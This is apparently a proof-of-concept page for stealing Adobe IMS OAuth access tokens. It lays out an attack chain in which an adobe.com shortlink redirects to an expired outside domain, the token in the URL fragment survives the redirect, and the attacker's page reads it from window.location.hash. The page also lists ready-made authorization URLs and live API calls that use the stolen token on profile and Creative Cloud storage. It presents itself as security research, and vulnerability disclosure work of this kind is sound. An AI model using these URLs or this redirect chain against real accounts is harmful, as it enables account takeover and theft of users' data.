Adobe IMS — OAuth Token Theft PoC
Security research demonstration. No data stored or exfiltrated. Researcher-owned test account only.
Checking for OAuth parameters...
Attack Chain
1. Victim visits: https://ims-na1.adobelogin.com/ims/authorize/v2?client_id=adobedotcom2&response_type=token&...
2. IMS shows legitimate Adobe login — no third-party consent prompt (first-party client)
3. After auth, IMS redirects to: https://www.adobe.com/go/cc#access_token=<JWT>
4. Adobe 301 → http://coenraets.com/#access_token=<JWT> (stale shortlink, expired domain)
5. Browser preserves fragment across redirect — token lands here
6. Attacker reads window.location.hash → full account access
Adobe Profile — Live API Call fetching...
Creative Cloud Storage — Live API Call
Test URLs
Visit these while logged into an Adobe account:
Implicit flow (direct token):
https://ims-na1.adobelogin.com/ims/authorize/v2?client_id=adobedotcom2&response_type=token&scope=openid,AdobeID&redirect_uri=https://www.adobe.com/go/cc
Auth code flow:
https://ims-na1.adobelogin.com/ims/authorize/v2?client_id=adobedotcom2&response_type=code&scope=openid,AdobeID&redirect_uri=https://www.adobe.com/go/cc